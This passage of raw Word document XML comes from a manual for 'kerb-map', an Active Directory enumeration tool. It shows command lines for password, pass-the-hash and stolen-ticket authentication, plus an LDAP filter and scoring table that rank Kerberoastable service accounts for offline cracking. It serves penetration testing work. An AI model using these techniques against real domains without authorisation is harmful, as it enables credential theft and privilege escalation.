        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3111C0A5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc224561290"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.  Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="11183D61" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>kerb-map supports three authentication methods, all of which are handled transparently through a single LDAP connection object. Once the connection is established, every module reuses it without re-authenticating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F777FF" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C34F99" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc224561291"/>
      <w:r>
        <w:t>3.1  Plaintext Password (-p)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="40D171E1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Authenticates via NTLM with a plaintext password. The credentials are never written to disk by kerb-map itself.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38E8402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E0AA1A6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith -p Summer2024!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40F14898" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037ACCCF" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc224561292"/>
      <w:r>
        <w:t>3.2  Pass-the-Hash (-H)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="190FCFA8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Uses the NTLM hash directly, bypassing the need for a plaintext password. This is the standard method when you have obtained hashes from a secretsdump or LSASS dump.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64EB8B08"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E9E2B30" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith \</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5CDA2D3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B418D65" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    -H 31d6cfe0d16ae931b73c59d7e0c089c0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3905626F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The tool accepts either NT-only (32 hex chars) or the full LM:NT format. If only NT is provided, the LM half is automatically padded with the empty LM hash (aad3b435b51404eeaad3b435b51404ee).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E12CB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3143C0C0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc224561293"/>
      <w:r>
        <w:t>3.3  Kerberos ccache (-k)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="0F4658C6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Uses a Kerberos ticket cache file. The KRB5CCNAME environment variable must be set to the path of a valid ccache file before running the tool.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5A497161"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8C8614C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Obtain a ticket with impacket first</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="74718B65"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E8F8F19" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>getTGT.py corp.local/jsmith:Password123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="146FC00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2FD8F50" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="33B404AE"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E2605AA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Or steal a ticket and convert it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="37450895"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C244A59" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>export KRB5CCNAME=/tmp/Administrator.ccache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="01195B6C"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E670435" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py -d corp.local -dc dc01.corp.local -u Administrator -k</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44D4DC95" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351F0943" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B31913" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc224561294"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.  Module Reference</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="2BD59730" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>kerb-map is built around independent modules that each perform a specific enumeration task. All modules share a single authenticated LDAP connection and perform only read-only queries unless noted otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C15E980" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FABB4E8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc224561295"/>
      <w:r>
        <w:t>4.1  SPN Scanner  (--spn)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="69480737" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The SPN scanner identifies every non-computer, non-disabled domain account that has a servicePrincipalName attribute set. These accounts are Kerberoastable: any authenticated domain user can request a Kerberos TGS ticket for them and attempt to crack the ticket offline without touching the account directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49A825" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C43AC8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc224561296"/>
      <w:r>
        <w:t>How it works</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3A0FCBFF" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The scanner performs a single LDAP query using the filter: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41D07558"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B11B81A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(&amp;(servicePrincipalName=*)(!(objectClass=computer))(!(cn=krbtgt))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2C29D9B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53277C6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  (!(userAccountControl:1.2.840.113556.1.4.803:=2)))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C924C2C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>It then pulls the following attributes for each match: sAMAccountName, servicePrincipalName, pwdLastSet, lastLogonTimestamp, msDS-SupportedEncryptionTypes, memberOf, userAccountControl, adminCount, and description.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73811623" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B3AF8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc224561297"/>
      <w:r>
        <w:t>Scoring Algorithm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0D52187C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Each Kerberoastable account receives a crack score from 0 to 100 based on these weighted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2880"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="2400"/>
      </w:tblGrid>
      <w:tr w:rsidR="00707BE4" w14:paraId="2F7CAA29" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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2181FF1A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Factor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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132448D0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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720A0829" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Points</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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05E7FA5E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="1A45FBB9" w14:textId="77777777">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C98C1B5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Encryption type</w:t>
            </w:r>
          </w:p>
        </w:tc>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B4C1C49" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>RC4 allowed (enc=0 or bit 2 set)</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1E60D0F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>+40</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18FF20F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>RC4 hashes crack ~10x faster than AES in hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="108AF31D" w14:textId="77777777">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9D6AC9F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Encryption type</w:t>
            </w:r>
          </w:p>
        </w:tc>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BA8FD06" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>AES only, enc type unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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6CFF7790" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>+20</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F9ACBD8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Slower but still crackable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="0BF44A62" w14:textId="77777777">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D9D6A9D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Password age</w:t>
            </w:r>
          </w:p>
        </w:tc>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B0FE306" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Never set</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B853CCB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>+15</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179E289" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Likely default or forgotten</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="4B121EC4" w14:textId="77777777">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5D65650" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Password age</w:t>
            </w:r>
          </w:p>
        </w:tc>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7ABA0430" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Older than 2 years</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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D3FB06E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>+25</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F6043B4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High chance of weak/guessable password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="1E2F44D0" w14:textId="77777777">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1331EE5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Password age</w:t>
            </w:r>
          </w:p>
        </w:tc>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134FAED" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Older than 1 year</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88B37BB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>+15</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FE5CE7C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Increased likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="32992C40" w14:textId="77777777">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66FAA45" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Admin membership</w:t>
            </w:r>
          </w:p>
        </w:tc>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4E3D036" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>adminCount=1 or in admin group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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2B79BD5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>+20</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8E209A8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Cracking gives immediate privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="21046BAE" w14:textId="77777777">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9437243" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Service type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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B83341A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MSSQLSvc, WSMAN, exchangeMDB</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372B964" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>+15-35</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33EF332" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High-value service accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="61F90C44" w14:textId="77777777">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1A3B3A0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Logon history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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02EE18F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Never logged in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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618FFC05" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>+10</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6BC43A2F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>May be unmaintained service account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A587BD3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F930F71" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc224561298"/>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="67C427F5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Results are sorted by crack score descending. The highest-priority targets are displayed first in the Priority Targets table with the exact GetUserSPNs.py command pre-filled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3DCDE6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D10DFF9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
